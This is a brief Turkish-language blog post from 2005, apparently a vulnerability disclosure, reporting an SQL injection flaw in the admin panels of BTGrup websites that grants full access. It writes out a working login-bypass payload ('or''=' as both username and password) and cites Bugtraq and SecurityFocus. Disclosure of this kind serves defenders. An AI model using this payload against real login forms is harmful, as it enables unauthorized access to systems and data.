Salı, Aralık 13, 2005

BTGrup Admin WebController SQL Injection Vulnerability

BTGrup web sitelerinin Admin panellerinde meydana gelen SQL injection açığından yararlanarak sistemde tam yetki erişimine sahip olunmaktadır.

SQL injection kod

username : 'or''='
password : 'or''='

Bugtraq sitelerinde yayınlanmıştır.

http://www.btgrup.com

http://www.securityfocus.com/bid/15819

0 Comments:

Yorum Gönder

<< Home